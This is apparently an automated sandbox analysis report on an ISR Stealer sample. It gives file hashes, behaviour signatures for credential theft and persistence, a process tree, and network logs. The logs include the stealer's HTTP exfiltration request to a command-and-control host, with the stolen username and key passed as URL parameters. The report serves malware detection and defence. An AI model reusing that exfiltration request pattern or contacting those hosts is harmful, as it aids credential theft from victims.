Analysis

  • max time kernel
    141s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    13/03/2024, 03:07 UTC

General

  • Target

    c4d20a36d9f0e1ca758818b3be981779.exe

  • Size

    606KB

  • MD5

    c4d20a36d9f0e1ca758818b3be981779

  • SHA1

    2d55fcb91c41aa7d63f240fc1c5a49c919cc4487

  • SHA256

    1fbf779d7f1d4dfe9cd3f7c84c6e5763bb77530acc11732563e7abaeaba65a93

  • SHA512

    e926955240c20b52d885a3471bd422cf0903e49260595419cdef1851676539b84379c1a6959a8ef9452352035f443052886d0a10c913da91824a0a0ae5e77ffe

  • SSDEEP

    12288:DrVRbtxoNY4psjC6bswqW4jV//1iVs9odGn:DrFuJVMFMie9odO

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer payload 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c4d20a36d9f0e1ca758818b3be981779.exe
    "C:\Users\Admin\AppData\Local\Temp\c4d20a36d9f0e1ca758818b3be981779.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Local\Temp\tmp1.EXE
        "C:\Users\Admin\AppData\Local\Temp\tmp1.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:2720
    • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp2.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Users\Admin\AppData\Local\Temp\tmp2.EXE
        "C:\Users\Admin\AppData\Local\Temp\tmp2.EXE"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        PID:2524

Network

  • US
    DNS
    ljcp.gov.pk
    tmp1.EXE
    Remote address:
    8.8.8.8:53
    Request
    ljcp.gov.pk
    IN A
    Response
    ljcp.gov.pk
    IN A
    175.107.60.195
  • US
    DNS
    www.mymobilewap.info
    tmp2.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.mymobilewap.info
    IN A
    Response
  • US
    DNS
    www.mymobilewap.info
    tmp2.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.mymobilewap.info
    IN A
    Response
  • PK
    GET
    http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
    tmp1.EXE
    Remote address:
    175.107.60.195:80
    Request
    GET /tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: ljcp.gov.pk
  • 175.107.60.195:80
    http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
    http
    tmp1.EXE
    532 B
    212 B
    7
    5

    HTTP Request

    GET http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
  • 8.8.8.8:53
    ljcp.gov.pk
    dns
    tmp1.EXE
    57 B
    73 B
    1
    1

    DNS Request

    ljcp.gov.pk

    DNS Response

    175.107.60.195

  • 8.8.8.8:53
    www.mymobilewap.info
    dns
    tmp2.EXE
    132 B
    290 B
    2
    2

    DNS Request

    www.mymobilewap.info

    DNS Request

    www.mymobilewap.info

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp2.exe

    Filesize

    216KB

    MD5

    f0c93f442042bbbe985674d671191ed3

    SHA1

    a9ebbe67032eec48673b42325682859ce06a5e2c

    SHA256

    9708ceb9b7f76534315948101b2c8493d0c96e8205eee25e7b8a5473f65b997e

    SHA512

    7e8978c682d0e735f8f7bc16d1fb99136e927c7dc1d6e0fe5be41f0ec0808af9203bf146653f9fe4ac806c91f532144f5b27ac2b9adcb7b3876d4ab02a75e776

  • \Users\Admin\AppData\Local\Temp\tmp1.exe

    Filesize

    156KB

    MD5

    c1cfb778cbfe135b6fb0d2b6b9116b38

    SHA1

    f90af1a915f603a6acc40c18a5d9e8e6eef8d015

    SHA256

    b5d32c93e9a815f775489aa2b0ab1f86d45821df344916237746557062d7e8fb

    SHA512

    8ca72c995233c5c14eb9d1b6d6b1b70f72f03acbfb578743b0da8bce03b36d0d2d7e005feefb2fffd55f803e41f9e17b5be8ccc5a333a34d426545fbb6443b0a

  • memory/2340-0-0x0000000000400000-0x000000000043C000-memory.dmp

    Filesize

    240KB

  • memory/2340-27-0x0000000000400000-0x000000000043C000-memory.dmp

    Filesize

    240KB

  • memory/2524-32-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-39-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-41-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-43-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2720-31-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/2720-45-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB
